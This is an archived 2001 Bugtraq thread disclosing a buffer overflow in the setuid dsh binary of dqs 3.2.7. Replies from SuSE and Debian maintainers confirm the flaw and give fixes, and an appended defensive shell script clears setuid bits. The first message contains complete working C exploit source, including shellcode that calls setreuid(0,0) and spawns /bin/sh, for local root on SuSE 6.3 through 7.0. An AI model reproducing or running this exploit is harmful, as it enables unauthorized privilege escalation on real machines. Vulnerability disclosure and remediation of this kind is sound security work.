6517688 2001-05-19 00:09 +0000 /183 lines/ dex dex <dexgod@softhome.net>
Sent by: joel@lysator.liu.se
Imported: 2001-05-19 04:52 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17096>
Subject: dqs 3.2.7 local root exploit.
------------------------------------------------------------
From: dex dex <dexgod@softhome.net>
To: bugtraq@securityfocus.com
Message-ID: <20010519000911.4356.qmail@securityfocus.com>
Subject: dqs 3.2.7 local root exploit.

Hello.

DESCRIPTION:
I found a buffer overflow vulnerability in /usr/bin/dsh (dqs 3.2.7
package).

I really don't know if this bug was discovered already. If that's the
case, then sorry =).

If a long line is given as the first argument, the program gives a
SIGSEGV signal.

This bug was reported to Drake Diedrich, maintainer for dqs
(Drake.Diedrich@anu.edu.adu).

AFFECTED:
SuSE 6.3, 6.4, 7.0 have dqs 3.2.7 by default and are therefore
vulnerable, maybe others.

FIX:
Remove the SUID permission

|root@netdex /root|# ls -la /usr/bin/dsh
-rwsr-xr-x   1 root     root       502748 May 18 00:36 /usr/bin/dsh
|root@netdex /root|# chmod -s /usr/bin/dsh
|root@netdex /root|# ls -la /usr/bin/dsh
-rwxr-xr-x   1 root     root       502748 May 18 00:36 /usr/bin/dsh
|root@netdex /root|#

EXAMPLE EXPLOIT:
You can find the exploit at
www.raza-mexicana.org/programas/programas/qsexp.c

And here it is:

----CUT HERE----
/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh (dqs 3.2.7 package) local root exploit.             */
/* SuSE 6.3, 6.4, and 7.0 are vulnerable.                           */
/* dex@raza-mexicana.org <> http://www.raza-mexicana.org            */
/* Greetings: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal,   */
/* megaflop and all of raza. What a drag to write them all out XD.  */
/* Special greetings to the little Spaniard (NOP) :P, you know why. */
/*                                                                  */
/* - dex@raza-mexicana.org <> http://www.raza-mexicana.org -        */
/********************************************************************/

/* Linux/x86 (32-bit) only: the shellcode uses int $0x80 and the
 * buffer layout assumes 4-byte pointers.  Build with a 32-bit
 * toolchain (e.g. gcc -m32). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFSIZE 2772   /* argument length needed to reach dsh's saved return address */
#define OFFSET   0      /* subtracted from our %esp to guess where the buffer lands in dsh */
#define ALIGN    0      /* shifts the shellcode by a few bytes if the guess is slightly off */

/* Current stack pointer; dsh's stack will be close to it because
 * execl() reuses the same process. */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
    return sp;
}

/* setreuid(0, 0) followed by execve("/bin/sh", ...).  Contains no NUL
 * bytes, so it survives being copied as a C string inside dsh. */
static char code[] =            /* stolen from mount.c :P */
    "\x29\xc0"                  /* subl %eax, %eax          */
    "\xb0\x46"                  /* movb $70, %al            */
    "\x29\xdb"                  /* subl %ebx, %ebx          */
    "\xb3\x0c"                  /* movb $12, %bl            */
    "\x80\xeb\x0c"              /* subb $12, %bl            */
    "\x89\xd9"                  /* movl %ebx, %ecx          */
    "\xcd\x80"                  /* int $0x80                */
    "\xeb\x18"                  /* jmp callz                */
    "\x5e"                      /* popl %esi                */
    "\x29\xc0"                  /* subl %eax, %eax          */
    "\x88\x46\x07"              /* movb %al, 0x07(%esi)     */
    "\x89\x46\x0c"              /* movl %eax, 0x0c(%esi)    */
    "\x89\x76\x08"              /* movl %esi, 0x08(%esi)    */
    "\xb0\x0b"                  /* movb $0x0b, %al          */
    "\x87\xf3"                  /* xchgl %esi, %ebx         */
    "\x8d\x4b\x08"              /* leal 0x08(%ebx), %ecx    */
    "\x8d\x53\x0c"              /* leal 0x0c(%ebx), %edx    */
    "\xcd\x80"                  /* int $0x80                */
    "\xe8\xe3\xff\xff\xff"      /* call start               */
    "\x2f\x62\x69\x6e\x2f\x73\x68";   /* "/bin/sh"          */

int main(int argc, char **argv)
{
    int i;
    unsigned long addr;
    char *buffer;
    int offset   = OFFSET;
    int buffsize = BUFFSIZE;
    int align    = ALIGN;

    if (argc > 1) offset   = atoi(argv[1]);
    if (argc > 2) align    = atoi(argv[2]);
    if (argc > 3) buffsize = atoi(argv[3]);

    buffer = malloc(buffsize + 8);
    if (buffer == NULL) {
        perror("malloc");
        return 1;
    }
    addr = get_sp() - offset;

    /* NOP sled over the whole buffer, the guessed address twice at the
     * very end (one of them overwrites the saved return address), and
     * the shellcode immediately before those two words. */
    for (i = 0; i < buffsize; i += 4)
        *(long *)&buffer[i] = 0x90909090;
    *(long *)&buffer[buffsize - 8] = addr;
    *(long *)&buffer[buffsize - 4] = addr;
    memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code));
    buffer[buffsize] = '\0';    /* execl() passes it as a C string */

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
    printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n");
    printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n");
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
    printf("[*] Address=0x%lx, Align=%d, Offset=%d\n", addr, align, offset);
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
    printf("[*] Starting....\n");

    /* The overlong first argument is what triggers the overflow. */
    execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", NULL);
    perror("execl");            /* only reached if dsh could not be run */
    return 1;
}
----EOF----

=================================================
Mail: dex@raza-mexicana.org
Page: http://www.raza-mexicana.org
===============================================
(6517688) /dex dex <dexgod@softhome.net>/-(Reflowed)

6519015 2001-05-19 05:26 +0200 /63 lines/ Roman Drahtmueller <draht@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2001-05-19 20:46 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: draht@suse.de
Recipient: Bugtraq (import) <17099>
Comment on text 6517688 by dex dex <dexgod@softhome.net>
Subject: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Message-ID: <ENOCOKE.draht.silence.0101051905112599024188505005-100000@suse>

> DESCRIPTION:
> I found a buffer overflow vulnerability in
> /usr/bin/dsh (dqs 3.2.7
> package).
>
> I really don't know if this bug was discovered
> already. If that's the case,
> then sorry =).

No, this is yet unknown to security@suse.de.

> If a long line is given as the first argument, the
> program gives a SIGSEGV
> signal.
>
> This bug was reported to Drake Diedrich, maintainer
> for dqs
> (Drake.Diedrich@anu.edu.adu).
>
> AFFECTED:
> SuSE 6.3, 6.4, 7.0 have dqs 3.2.7 by default
> and are therefore vulnerable,
> maybe others.

I confirm this vulnerability and that dqs has the setuid bit on the file
/usr/bin/dsh, but the package (as a package in the clustering series)
is not installed by default. The fix (to remove the suid bit) is
correct.

If you have selected to set the variable PERMISSION_SECURITY in
/etc/rc.config to "secure local" in SuSE-7.1 (recommended for
security-enhanced settings), you are not vulnerable.
On SuSE-7.1, in addition to the chmod command below, change the files
/etc/permissions.*, too, to reflect the removed suid bit.

If you do not need the dqs package, simply remove it using the command

  rpm -e dqs

Of course, we will provide update packages as soon as possible.

> FIX:
> Remove the SUID permission
> |root@netdex /root|# ls -la /usr/bin/dsh
> -rwsr-xr-x   1 root     root       502748 May 18
> 00:36 /usr/bin/dsh
> |root@netdex /root|# chmod -s /usr/bin/dsh
> |root@netdex /root|# ls -la /usr/bin/dsh
> -rwxr-xr-x   1 root     root       502748 May 18

Regards,
Roman Drahtmüller, SuSE Security.

--
 -                                                                     -
| Roman Drahtmüller      <draht@suse.de>   "Caution: Cape does not      |
| SuSE GmbH - Security                      enable user to fly."        |
| Nürnberg, Germany                         (Batman Costume warning label) |
 -                                                                     -
(6519015) /Roman Drahtmueller <draht@suse.de>/(Reflowed)

6519208 2001-05-19 14:09 +1000 /46 lines/ Drake Diedrich <Drake.Diedrich@anu.edu.au>
Sent by: joel@lysator.liu.se
Imported: 2001-05-19 21:59 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17102>
Comment on text 6517688 by dex dex <dexgod@softhome.net>
Subject: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
On Sat, May 19, 2001 at 12:09:11AM -0000, dex dex wrote:
>
> DESCRIPTION:
> I found a buffer overflow vulnerability in
> /usr/bin/dsh (dqs 3.2.7
> package).
> ...
>
> This bug was reported to Drake Diedrich, maintainer
> for dqs
> (Drake.Diedrich@anu.edu.adu).
>

I maintain only the Debian packaging of the DQS suite. /usr/bin/dsh
can be entirely removed from a DQS cluster with no ill effects, and was
removed from the Debian packages in early 1998 as part of a general
cleanup of the package. Debian 2.1 (slink) and later are not
vulnerable.

The original publisher (SCRI, Florida State University) is no longer
maintaining DQS or employing the original author, but has also refused
to relax distribution restrictions, making it difficult to found a new
developer community.
dqs (3.1.8-2) unstable; urgency=low

  * Summarize and rotate monthly accounting logs
  * Replaced /bin/mail with /usr/bin/sendmail
  * Made /etc/dqs/conf_file into a configuration file.  Changed DQS_BIN.
  * Deleted dqs_options, dqs_random, and dsh
  * Moved qmaster and dqs_execd to /usr/lib/dqs, edit DQS_BIN in
    /etc/dqs/conf_file
  * Switched to debhelper from debstd
  * Added restart and force-reload to /etc/init.d/dqs
  * A million Lintian fixes.

 -- Drake Diedrich <Drake.Diedrich@anu.edu.au>  Mon, 16 Feb 1998 11:47:04 +1100

--
Dr. Drake Diedrich, Head - Information and Communications Unit
John Curtin School of Medical Research, GPO Box 334 Canberra ACT 2601
Voice: +61(2)6125-2528   FAX: +61(2)6125-4823
(6519208) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/(Reflowed)
Attachment (application/pgp-signature) in text 6519209

6519209 2001-05-19 14:09 +1000 /12 lines/ Drake Diedrich <Drake.Diedrich@anu.edu.au>
Imported: 2001-05-19 21:59 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17103>
Attachment (text/plain) to text 6519208
Subject: Attachment to: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iQCVAwUBOwXyA9D4/OIVS4ptAQFKjwP/dAbOH7uJ2akj7JhVHCo2qobgG5v7p1Ab
8MWbaf6MojCOUJlHYKpYnhHKwCyWl6UicL3cPCQOkE5fPyarIOOVp9guFn7OR+nh
YYVLOf3/sciJW4UKIVKYqtAppCcnnRdW9ckJAy+D4LZ1pySKcASMs1y4oUgndc3P
xtx6WSn9hy0=
=JRH2
-----END PGP SIGNATURE-----
(6519209) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/
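The remediation in this thread has two parts that are easy to get half right: dropping the setuid bit on /usr/bin/dsh (dex's fix), and, as Roman Drahtmueller points out for SuSE, also editing /etc/permissions.* so the bit is not re-applied by the permissions tooling later. The script below is an added example, not part of the Bugtraq thread or of any SuSE or dqs code; it turns those steps into functions you can check, and adds the find(1) sweep you would run afterwards for other setuid-root files. It assumes the permissions file uses one "path owner.group mode" entry per line (the SuSE layout as I know it; verify against your own file before trusting the awk pattern) and runs its demo against a scratch directory and a constructed sample permissions file, so it is safe to run anywhere.

```shell
#!/bin/sh
# Added example (not from the thread): setuid-bit remediation as
# checkable functions.  Assumption: permissions file lines look like
#   /usr/bin/dsh root.root 4755
# which is the SuSE /etc/permissions.* layout as I know it.

# True if a mode string from `ls -l` (e.g. -rwsr-xr-x, as shown in the
# advisory) carries setuid: the 4th character is 's' (owner execute
# also set) or 'S' (setuid without owner execute).
mode_is_setuid() {
    case "$1" in
        ???[sS]*) return 0 ;;
        *)        return 1 ;;
    esac
}

# True if FILE currently has the setuid bit set on disk.
file_is_setuid() {
    [ -u "$1" ]
}

# Clear setuid and setgid on FILE (chmod -s does both), then confirm.
drop_suid() {
    chmod u-s,g-s "$1" && ! [ -u "$1" ] && ! [ -g "$1" ]
}

# Print PERMFILE ($1) with TARGET's ($2) mode changed from 4xxx to 0xxx,
# e.g. "/usr/bin/dsh root.root 4755" -> "/usr/bin/dsh root.root 0755".
# Every other line passes through unchanged.
strip_suid_in_permissions() {
    awk -v target="$2" '
        $1 == target && $3 ~ /^4[0-7][0-7][0-7]$/ { $3 = "0" substr($3, 2) }
        { print }
    ' "$1"
}

# Setuid-root regular files under DIR, staying on one filesystem: the
# sweep to run after fixing dsh to see what else is in the same boat.
list_setuid_root() {
    find "$1" -xdev -type f -perm -4000 -user root 2>/dev/null
}

# Demo on a scratch directory with a constructed permissions file.
demo() {
    t=$(mktemp -d) || return 1
    : > "$t/dsh"
    chmod 4755 "$t/dsh"                       # stand-in for the vulnerable binary
    printf '%s\n' '/usr/bin/dsh root.root 4755' \
                  '/usr/bin/passwd root.shadow 4755' > "$t/permissions.local"
    echo "before: $(ls -l "$t/dsh" | cut -c1-10)"
    drop_suid "$t/dsh"
    echo "after:  $(ls -l "$t/dsh" | cut -c1-10)"
    strip_suid_in_permissions "$t/permissions.local" /usr/bin/dsh
    rm -rf "$t"
}

demo
```

The awk rewrite prints to stdout rather than editing in place so you can diff it against the original /etc/permissions.* before committing the change; Roman's alternative of simply removing the package (rpm -e dqs) avoids both steps when dsh is not needed, which Drake Diedrich's note about Debian suggests is the common case.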